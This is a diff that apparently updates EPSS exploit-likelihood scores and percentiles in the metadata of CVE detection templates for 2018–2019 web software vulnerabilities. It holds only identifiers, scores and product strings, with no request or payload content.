a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-19915 cwe-id: CWE-79 epss-score: 0.00153 - epss-percentile: 0.51446 + epss-percentile: 0.51511 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index 8718eab82a..26b4fb6d6a 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-20009 cwe-id: CWE-79 epss-score: 0.00153 - epss-percentile: 0.51446 + epss-percentile: 0.51511 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml index 6dc7823d93..f272047009 100644 --- a/http/cves/2018/CVE-2018-20010.yaml +++ b/http/cves/2018/CVE-2018-20010.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-20010 cwe-id: CWE-79 epss-score: 0.00153 - epss-percentile: 0.51446 + epss-percentile: 0.51511 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20011.yaml b/http/cves/2018/CVE-2018-20011.yaml index 5891e64bf8..44e113ccba 100644 --- a/http/cves/2018/CVE-2018-20011.yaml +++ b/http/cves/2018/CVE-2018-20011.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-20011 cwe-id: CWE-79 epss-score: 0.00153 - epss-percentile: 0.51446 + epss-percentile: 0.51511 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index 00353499c4..a2bd7a0dbb 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-20462 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.62311 + epss-percentile: 0.62459 cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20463.yaml b/http/cves/2018/CVE-2018-20463.yaml index 60ae3b146e..6ccd19209f 100644 --- a/http/cves/2018/CVE-2018-20463.yaml +++ b/http/cves/2018/CVE-2018-20463.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-20463 cwe-id: CWE-22 epss-score: 0.01939 - epss-percentile: 0.87341 + epss-percentile: 0.87393 cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index be286753d9..502c11994f 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-20470 cwe-id: CWE-22 - epss-score: 0.67359 - epss-percentile: 0.97636 + epss-score: 0.60641 + epss-percentile: 0.97491 cpe: cpe:2.3:a:sahipro:sahi_pro:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index 54695e5b0b..455510d369 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-20526 cwe-id: CWE-434 - epss-score: 0.01112 - epss-percentile: 0.82841 + epss-score: 0.00803 + epss-percentile: 0.79773 cpe: cpe:2.3:a:roxyfileman:roxy_fileman:1.4.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20608.yaml b/http/cves/2018/CVE-2018-20608.yaml index 61d2813e02..6c9aed4c95 100644 --- a/http/cves/2018/CVE-2018-20608.yaml +++ b/http/cves/2018/CVE-2018-20608.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-20608 cwe-id: CWE-200 epss-score: 0.03654 - epss-percentile: 0.90712 + epss-percentile: 0.90785 cpe: cpe:2.3:a:txjia:imcat:4.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index 62d4dbb318..4f43525ce4 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-20824 cwe-id: CWE-79 epss-score: 0.00203 - epss-percentile: 0.5806 + epss-percentile: 0.58221 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml index 7ca5e2f2e0..575c8c397e 100644 --- a/http/cves/2018/CVE-2018-20985.yaml +++ b/http/cves/2018/CVE-2018-20985.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-20985 cwe-id: CWE-20 - epss-score: 0.01138 - epss-percentile: 0.83049 + epss-score: 0.0117 + epss-percentile: 0.83424 cpe: cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-2392.yaml b/http/cves/2018/CVE-2018-2392.yaml index 56b0624e23..41d33846f5 100644 --- a/http/cves/2018/CVE-2018-2392.yaml +++ b/http/cves/2018/CVE-2018-2392.yaml @@ -22,8 +22,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-2392 cwe-id: CWE-611 - epss-score: 0.0032 - epss-percentile: 0.67288 + epss-score: 0.00278 + epss-percentile: 0.64901 cpe: cpe:2.3:a:sap:internet_graphics_server:7.20:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml index befb4c1515..96a1d44d7e 100644 --- a/http/cves/2018/CVE-2018-2791.yaml +++ b/http/cves/2018/CVE-2018-2791.yaml @@ -20,7 +20,7 @@ info: cvss-score: 8.2 cve-id: CVE-2018-2791 epss-score: 0.02132 - epss-percentile: 0.88028 + epss-percentile: 0.88082 cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml index 4f3393b42f..ed2497fb46 100644 --- a/http/cves/2018/CVE-2018-2894.yaml +++ b/http/cves/2018/CVE-2018-2894.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-2894 - epss-score: 0.97233 - epss-percentile: 0.99802 + epss-score: 0.97327 + epss-percentile: 0.99866 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml index 3af6eae2a0..0124673648 100644 --- a/http/cves/2018/CVE-2018-3167.yaml +++ b/http/cves/2018/CVE-2018-3167.yaml @@ -20,7 +20,7 @@ info: cvss-score: 5.3 cve-id: CVE-2018-3167 epss-score: 0.00727 - epss-percentile: 0.7851 + epss-percentile: 0.78615 cpe: cpe:2.3:a:oracle:application_management_pack:12.1.3:*:*:*:*:e-business_suite:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml index d151e086d0..837e55ff78 100644 --- a/http/cves/2018/CVE-2018-3238.yaml +++ b/http/cves/2018/CVE-2018-3238.yaml @@ -19,7 +19,7 @@ info: cvss-score: 6.9 cve-id: CVE-2018-3238 epss-score: 0.00471 - epss-percentile: 0.72867 + epss-percentile: 0.72995 cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2018/CVE-2018-3714.yaml b/http/cves/2018/CVE-2018-3714.yaml index 680006c433..8d9cad6c7d 100644 --- a/http/cves/2018/CVE-2018-3714.yaml +++ b/http/cves/2018/CVE-2018-3714.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-3714 cwe-id: CWE-22 epss-score: 0.00182 - epss-percentile: 0.55311 + epss-percentile: 0.55484 cpe: cpe:2.3:a:node-srv_project:node-srv:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-3760.yaml b/http/cves/2018/CVE-2018-3760.yaml index 7ae3b6ab26..0697634b4d 100644 --- a/http/cves/2018/CVE-2018-3760.yaml +++ b/http/cves/2018/CVE-2018-3760.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-3760 cwe-id: CWE-200,CWE-22 - epss-score: 0.03601 - epss-percentile: 0.90655 + epss-score: 0.02876 + epss-percentile: 0.89714 cpe: cpe:2.3:a:redhat:cloudforms:4.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-3810.yaml b/http/cves/2018/CVE-2018-3810.yaml index 4ded6480b0..c6d65a12c0 100644 --- a/http/cves/2018/CVE-2018-3810.yaml +++ b/http/cves/2018/CVE-2018-3810.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-3810 cwe-id: CWE-287 epss-score: 0.792 - epss-percentile: 0.9797 + epss-percentile: 0.97997 cpe: cpe:2.3:a:oturia:smart_google_code_inserter:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index e14c797be9..7959c5d2c9 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-5230 cwe-id: CWE-79 epss-score: 0.00203 - epss-percentile: 0.5806 + epss-percentile: 0.58221 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml index 3cb5382fc2..33983435f8 100644 --- a/http/cves/2018/CVE-2018-5233.yaml +++ b/http/cves/2018/CVE-2018-5233.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-5233 cwe-id: CWE-79 epss-score: 0.00295 - epss-percentile: 0.65853 + epss-percentile: 0.66027 cpe: cpe:2.3:a:getgrav:grav_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-5316.yaml b/http/cves/2018/CVE-2018-5316.yaml index e899a019f4..075a733b66 100644 --- a/http/cves/2018/CVE-2018-5316.yaml +++ b/http/cves/2018/CVE-2018-5316.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-5316 cwe-id: CWE-79 epss-score: 0.00175 - epss-percentile: 0.5452 + epss-percentile: 0.54678 cpe: cpe:2.3:a:patsatech:sagepay_server_gateway_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index 485fa24f10..eb3c764311 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-5715 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47319 + epss-percentile: 0.47426 cpe: cpe:2.3:a:sugarcrm:sugarcrm:3.5.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml index e09b1d654e..29dccf8834 100644 --- a/http/cves/2018/CVE-2018-6008.yaml +++ b/http/cves/2018/CVE-2018-6008.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-6008 cwe-id: CWE-200 epss-score: 0.3768 - epss-percentile: 0.96834 + epss-percentile: 0.96853 cpe: cpe:2.3:a:joomlatag:jtag_members_directory:5.3.7:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index 4c4c5092dc..e18e0b2d2a 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-6184 cwe-id: CWE-22 epss-score: 0.00396 - epss-percentile: 0.70545 + epss-percentile: 0.70715 cpe: cpe:2.3:a:zeit:next.js:4.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index 266e526eff..320fe9546f 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-6200 cwe-id: CWE-601 epss-score: 0.00121 - epss-percentile: 0.46027 + epss-percentile: 0.46136 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index 98640eaba6..6c24434bb6 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-6530 cwe-id: CWE-78 - epss-score: 0.94099 - epss-percentile: 0.98958 + epss-score: 0.93644 + epss-percentile: 0.98928 cpe: cpe:2.3:o:dlink:dir-860l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml index 97ff12e794..6c57ec227e 100644 --- a/http/cves/2018/CVE-2018-6910.yaml +++ b/http/cves/2018/CVE-2018-6910.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-6910 cwe-id: CWE-668 epss-score: 0.03394 - epss-percentile: 0.90409 + epss-percentile: 0.9047 cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml index 1bca7467d4..0475729576 100644 --- a/http/cves/2018/CVE-2018-7251.yaml +++ b/http/cves/2018/CVE-2018-7251.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-7251 cwe-id: CWE-200 epss-score: 0.06473 - epss-percentile: 0.92965 + epss-percentile: 0.9301 cpe: cpe:2.3:a:anchorcms:anchor:0.12.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index b53cc324d5..0c27881c09 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-7282 cwe-id: CWE-89 - epss-score: 0.21784 - epss-percentile: 0.95981 + epss-score: 0.15744 + epss-percentile: 0.9541 cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml index 55b74bb209..e635ce9c58 100644 --- a/http/cves/2018/CVE-2018-7422.yaml +++ b/http/cves/2018/CVE-2018-7422.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-7422 cwe-id: CWE-22 epss-score: 0.94711 - epss-percentile: 0.99066 + epss-percentile: 0.99086 cpe: cpe:2.3:a:siteeditor:site_editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml index 4dfcb25342..f727f6677a 100644 --- a/http/cves/2018/CVE-2018-7467.yaml +++ b/http/cves/2018/CVE-2018-7467.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-7467 cwe-id: CWE-22 epss-score: 0.00396 - epss-percentile: 0.70545 + epss-percentile: 0.70715 cpe: cpe:2.3:a:axxonsoft:next:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7490.yaml b/http/cves/2018/CVE-2018-7490.yaml index 315cb70465..73d0d87d7f 100644 --- a/http/cves/2018/CVE-2018-7490.yaml +++ b/http/cves/2018/CVE-2018-7490.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-7490 cwe-id: CWE-22 epss-score: 0.9541 - epss-percentile: 0.99196 + epss-percentile: 0.99218 cpe: cpe:2.3:a:unbit:uwsgi:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml index 1131d5c68c..847e521b49 100644 --- a/http/cves/2018/CVE-2018-7600.yaml +++ b/http/cves/2018/CVE-2018-7600.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-7600 cwe-id: CWE-20 - epss-score: 0.9756 - epss-percentile: 0.99998 + epss-score: 0.97571 + epss-percentile: 1 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index f9ef28680d..b162ebd825 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-7653 cwe-id: CWE-79 epss-score: 0.00797 - epss-percentile: 0.79616 + epss-percentile: 0.79696 cpe: cpe:2.3:a:yzmcms:yzmcms:3.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml index f8a9a3f35d..2daf0b47ed 100644 --- a/http/cves/2018/CVE-2018-7662.yaml +++ b/http/cves/2018/CVE-2018-7662.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2018-7662 cwe-id: CWE-200 - epss-score: 0.00286 - epss-percentile: 0.65235 + epss-score: 0.00292 + epss-percentile: 0.65814 cpe: cpe:2.3:a:couchcms:couch:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index 80a19539e4..9c4f2184fe 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-7700 cwe-id: CWE-352 epss-score: 0.73235 - epss-percentile: 0.97796 + epss-percentile: 0.97827 cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-7719.yaml b/http/cves/2018/CVE-2018-7719.yaml index bb6864a140..2ce4f4f2ae 100644 --- a/http/cves/2018/CVE-2018-7719.yaml +++ b/http/cves/2018/CVE-2018-7719.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-7719 cwe-id: CWE-22 epss-score: 0.09221 - epss-percentile: 0.94062 + epss-percentile: 0.94091 cpe: cpe:2.3:a:acrolinx:acrolinx_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml index a620724c0a..33bbcbc183 100644 --- a/http/cves/2018/CVE-2018-8006.yaml +++ b/http/cves/2018/CVE-2018-8006.yaml @@ -26,7 +26,7 @@ info: cve-id: CVE-2018-8006 cwe-id: CWE-79 epss-score: 0.34776 - epss-percentile: 0.96697 + epss-percentile: 0.96724 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index 9d54d17f68..67e9f23247 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-8033 cwe-id: CWE-200 epss-score: 0.00813 - epss-percentile: 0.79798 + epss-percentile: 0.79886 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8715.yaml b/http/cves/2018/CVE-2018-8715.yaml index db6ae8f643..340acfbd6f 100644 --- a/http/cves/2018/CVE-2018-8715.yaml +++ b/http/cves/2018/CVE-2018-8715.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-8715 cwe-id: CWE-287 epss-score: 0.00927 - epss-percentile: 0.81143 + epss-percentile: 0.81212 cpe: cpe:2.3:a:embedthis:appweb:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml index 15090a4595..e6ba04f8b3 100644 --- a/http/cves/2018/CVE-2018-8719.yaml +++ b/http/cves/2018/CVE-2018-8719.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-8719 cwe-id: CWE-532 epss-score: 0.03177 - epss-percentile: 0.90101 + epss-percentile: 0.90155 cpe: cpe:2.3:a:wpsecurityauditlog:wp_security_audit_log:3.1.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8727.yaml b/http/cves/2018/CVE-2018-8727.yaml index dd639ac9a9..3689539da4 100644 --- a/http/cves/2018/CVE-2018-8727.yaml +++ b/http/cves/2018/CVE-2018-8727.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-8727 cwe-id: CWE-22 epss-score: 0.01105 - epss-percentile: 0.8279 + epss-percentile: 0.82875 cpe: cpe:2.3:a:mirasys:dvms_workstation:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8770.yaml b/http/cves/2018/CVE-2018-8770.yaml index ff78a2c379..cc3d13f445 100644 --- a/http/cves/2018/CVE-2018-8770.yaml +++ b/http/cves/2018/CVE-2018-8770.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-8770 cwe-id: CWE-200 epss-score: 0.00197 - epss-percentile: 0.57359 + epss-percentile: 0.57527 cpe: cpe:2.3:a:cobub:razor:0.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8823.yaml b/http/cves/2018/CVE-2018-8823.yaml index 2fbfc41994..4e8e8a31fa 100644 --- a/http/cves/2018/CVE-2018-8823.yaml +++ b/http/cves/2018/CVE-2018-8823.yaml @@ -16,16 +16,17 @@ info: cvss-score: 9.8 cve-id: CVE-2018-8823 cwe-id: CWE-94 + epss-score: 0.24062 + epss-percentile: 0.96167 cpe: cpe:2.3:a:responsive_mega_menu_pro_project:responsive_mega_menu_pro:1.0.32:*:*:*:*:prestashop:*:* metadata: + verified: true max-request: 1 vendor: responsive_mega_menu_pro_project product: responsive_mega_menu_pro framework: prestashop shodan-query: http.component:"prestashop" - verified: true tags: cve,cve2018,prestashop,rce - variables: num: "999999999" diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml index bc15a47160..0dc9b2996c 100644 --- a/http/cves/2018/CVE-2018-9118.yaml +++ b/http/cves/2018/CVE-2018-9118.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-9118 cwe-id: CWE-22 epss-score: 0.08219 - epss-percentile: 0.937 + epss-percentile: 0.93738 cpe: cpe:2.3:a:99robots:wp_background_takeover_advertisements:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9161.yaml b/http/cves/2018/CVE-2018-9161.yaml index 8752fb8d70..1ff7dce955 100644 --- a/http/cves/2018/CVE-2018-9161.yaml +++ b/http/cves/2018/CVE-2018-9161.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-9161 cwe-id: CWE-798 epss-score: 0.26342 - epss-percentile: 0.96273 + epss-percentile: 0.96302 cpe: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9205.yaml b/http/cves/2018/CVE-2018-9205.yaml index 81457c925a..e67e3062da 100644 --- a/http/cves/2018/CVE-2018-9205.yaml +++ b/http/cves/2018/CVE-2018-9205.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-9205 cwe-id: CWE-22 epss-score: 0.0276 - epss-percentile: 0.89463 + epss-percentile: 0.89516 cpe: cpe:2.3:a:drupal:avatar_uploader:7.x-1.0:beta8:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml index c1775e56b1..bd013d0056 100644 --- a/http/cves/2018/CVE-2018-9845.yaml +++ b/http/cves/2018/CVE-2018-9845.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-9845 cwe-id: CWE-178 epss-score: 0.01393 - epss-percentile: 0.84885 + epss-percentile: 0.84966 cpe: cpe:2.3:a:etherpad:etherpad_lite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-9995.yaml b/http/cves/2018/CVE-2018-9995.yaml index 58fac4665d..2aa13e571a 100644 --- a/http/cves/2018/CVE-2018-9995.yaml +++ b/http/cves/2018/CVE-2018-9995.yaml @@ -23,7 +23,7 @@ info: cvss-score: 9.8 cve-id: CVE-2018-9995 epss-score: 0.92532 - epss-percentile: 0.98764 + epss-percentile: 0.98794 cpe: cpe:2.3:o:tbkvision:tbk-dvr4216_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index 4acec11a92..6e4861704f 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-0193 cwe-id: CWE-94 - epss-score: 0.94144 - epss-percentile: 0.98968 + epss-score: 0.94797 + epss-percentile: 0.99099 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index 4070490e52..dcdcbccfd6 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-0221 cwe-id: CWE-79 epss-score: 0.00915 - epss-percentile: 0.81001 + epss-percentile: 0.81078 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index 9da37eb56b..fbfc0f819e 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-0230 cwe-id: CWE-1321 - epss-score: 0.94961 - epss-percentile: 0.99103 + epss-score: 0.94954 + epss-percentile: 0.9912 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml index a736620099..48027975e7 100644 --- a/http/cves/2019/CVE-2019-10068.yaml +++ b/http/cves/2019/CVE-2019-10068.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-10068 cwe-id: CWE-502 - epss-score: 0.97392 - epss-percentile: 0.99902 + epss-score: 0.97356 + epss-percentile: 0.99883 cpe: cpe:2.3:a:kentico:kentico:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 8cbefa0fdf..ef18b72fbe 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-10092 cwe-id: CWE-79 - epss-score: 0.05939 - epss-percentile: 0.92661 + epss-score: 0.07116 + epss-percentile: 0.9334 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index 6695961088..6cc79e0b2f 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2019-10098 cwe-id: CWE-601 epss-score: 0.10593 - epss-percentile: 0.94471 + epss-percentile: 0.94493 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1010287.yaml b/http/cves/2019/CVE-2019-1010287.yaml index 1d8d9985b4..644c115acf 100644 --- a/http/cves/2019/CVE-2019-1010287.yaml +++ 